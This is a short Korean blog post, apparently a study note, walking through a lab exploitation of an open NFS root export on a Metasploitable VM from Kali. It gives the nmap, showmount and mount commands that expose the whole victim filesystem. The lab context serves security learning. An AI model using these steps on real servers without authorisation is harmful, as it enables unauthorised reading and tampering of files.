Self-Improvement
NFS Exported Share Information Disclosure 취약점 본문
*정의
상대 서버의 NFS 공유 자원에 모든 호스트들이 접근 가능하며 마운트를 수행하여 파일을 읽고 쓰기를 할 수가 있는 취약점이다.
Attacker : kali
Victim : metasploitable
*실습
(kali)
root@kali:~# nmap -sV -p 2049 192.168.10.134
root@kali:~# showmount -e 192.168.10.134
모든 호스트가 접근이 가능하다.
root@kali:~# mount 192.168.10.134:/ /nfsmount
root@kali:~# df -h | grep 192.168.10.134
root@kali:~# ls /nfsmount/
상대 서버가 공유 경로를 /(루트)로 하였음으로 하위 폴더, 파일에 접근 가능함으로 취약하다.
'Kali Linux > Metasploitable' 카테고리의 다른 글
| Multiple Vendor DNS Query ID Field Prediction Cache Poisoning 취약점 (0) | 2018.10.21 |
|---|---|
| VNC Server 'password' Password 취약점 (0) | 2018.10.21 |
| Bind Shell Backdoor Detection 취약점 (0) | 2018.10.21 |
| 세션을 이용한 post/hashdump (패스워드 크랙) 실습 (0) | 2018.10.21 |
| meterpreter을 이용한 노트북 webcam 제어 (0) | 2018.10.21 |
'Kali Linux/Metasploitable' Related Articles
more
